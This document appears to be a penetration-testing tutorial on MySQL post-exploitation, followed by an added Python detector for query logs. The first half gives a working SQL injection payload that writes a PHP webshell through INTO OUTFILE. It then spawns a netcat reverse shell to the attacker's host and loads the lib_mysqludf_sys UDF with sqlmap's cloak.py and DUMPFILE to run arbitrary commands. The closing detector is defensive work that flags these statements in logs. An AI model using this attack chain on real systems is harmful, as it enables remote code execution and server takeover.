Webshell and UDF
If we have write permission, we can use a UNION attack and INTO OUTFILE to create a PHP webshell on the target system:
SELECT username,password FROM users WHERE id = '1' UNION SELECT 1,'<?php system($_GET["cmd"]);?>' INTO OUTFILE '/var/www/html/images/webshell.php';
Here we choose the images directory since it is usually owned by the www-data user, not root.
Once the webshell is created successfully, we can spawn a netcat reverse shell. Start a listener on our local machine:
nc -nvlp 443
Spawn a netcat reverse shell using the webshell:
http://127.0.0.1/images/webshell.php?cmd=nc -e /bin/bash <local_ip> 443
There is a plugin, lib_mysqludf_sys, which contains the following dangerous functions:
sys_eval(): executes any command and returns the result
sys_exec(): executes any command and returns the return code
sys_get(): gets an environment variable
sys_set(): creates or modifies an environment variable
MySQL does not have this lib by default. In order to use these functions, we have to import lib_mysqludf_sys first. Generate a binary version of this lib using sqlmap cloak.py:
cd sqlmap/extra/cloak
python3 cloak.py -d -i ../../data/udf/mysql/linux/32/lib_mysqludf_sys.so_ -o lib_mysqludf_sys.so
Grab its content as hex:
xxd -ps lib_mysqludf_sys.so
Connect to MySQL. In the MySQL shell, copy and paste the hex data and unhex() it:
SELECT unhex('<hex_data_in_lib_linux.so>') INTO DUMPFILE '/usr/lib/mysql/plugin/lib_mysqludf_sys.so';
Here we use DUMPFILE instead of OUTFILE since DUMPFILE outputs an unmodified binary file while OUTFILE adds newlines and escapes some special characters.
Export the sys_eval() function from lib_mysqludf_sys.so:
CREATE FUNCTION sys_eval returns string soname "lib_mysqludf_sys.so";
At this stage we can execute any command using the sys_eval() function:
SELECT sys_eval('id');
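From the defender's side, each step above (the INTO OUTFILE / INTO DUMPFILE write, the CREATE FUNCTION ... SONAME registration, and the sys_* calls) leaves a recognizable statement in the MySQL query log. The following detector is an added example, not part of the original page; the names classify, scan and SENSITIVE_DIRS are hypothetical, and the log lines are constructed samples with the payload and hex data replaced by placeholders.

```python
import re

# Assumed web root and plugin_dir (paths taken from the page); adjust per host.
SENSITIVE_DIRS = ("/var/www/", "/usr/lib/mysql/plugin/")

FILE_WRITE = re.compile(r"\bINTO\s+(OUTFILE|DUMPFILE)\s+'([^']+)'", re.I)
UDF_CREATE = re.compile(
    r"\bCREATE\s+(?:AGGREGATE\s+)?FUNCTION\s+(\w+)\s+RETURNS\s+\w+"
    r"\s+SONAME\s+['\"]([^'\"]+)['\"]", re.I)
UDF_CALL = re.compile(r"\b(sys_eval|sys_exec|sys_get|sys_set)\s*\(", re.I)


def classify(statement):
    """Return (rule, detail, severity) findings for one logged SQL statement."""
    findings = []
    m = FILE_WRITE.search(statement)
    if m:
        path = m.group(2)
        # Web root, plugin dir, or script/library targets rate high; other exports medium.
        risky = path.startswith(SENSITIVE_DIRS) or path.lower().endswith((".php", ".so"))
        findings.append(("file_write", f"{m.group(1).upper()} {path}", "high" if risky else "medium"))
    m = UDF_CREATE.search(statement)
    if m:
        findings.append(("udf_create", f"{m.group(1)} from {m.group(2)}", "high"))
    # CREATE FUNCTION names the UDF without "(", so it is not counted as a call.
    for m in UDF_CALL.finditer(statement):
        findings.append(("udf_call", m.group(1).lower(), "high"))
    return findings


def scan(log_lines):
    """Return (line_number, rule, detail, severity) for every hit in the log."""
    return [(n, *f) for n, line in enumerate(log_lines, 1) for f in classify(line)]


# Constructed sample lines, loosely in the style of the MySQL general query log.
SAMPLE_LOG = [
    "2024-05-01T10:00:01Z 12 Query SELECT username,password FROM users WHERE id = '1'",
    "2024-05-01T10:00:07Z 12 Query SELECT username,password FROM users WHERE id = '1' "
    "UNION SELECT 1,'<payload>' INTO OUTFILE '/var/www/html/images/webshell.php'",
    "2024-05-01T10:03:10Z 15 Query SELECT unhex('<hex>') INTO DUMPFILE "
    "'/usr/lib/mysql/plugin/lib_mysqludf_sys.so'",
    "2024-05-01T10:03:20Z 15 Query CREATE FUNCTION sys_eval returns string soname \"lib_mysqludf_sys.so\"",
    "2024-05-01T10:03:25Z 15 Query SELECT sys_eval('id')",
    "2024-05-01T11:00:00Z 20 Query SELECT * FROM report INTO OUTFILE '/tmp/report.csv'",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The last sample line shows a routine export to /tmp being rated medium rather than high, which keeps legitimate OUTFILE use from drowning out writes into the web root or plugin directory.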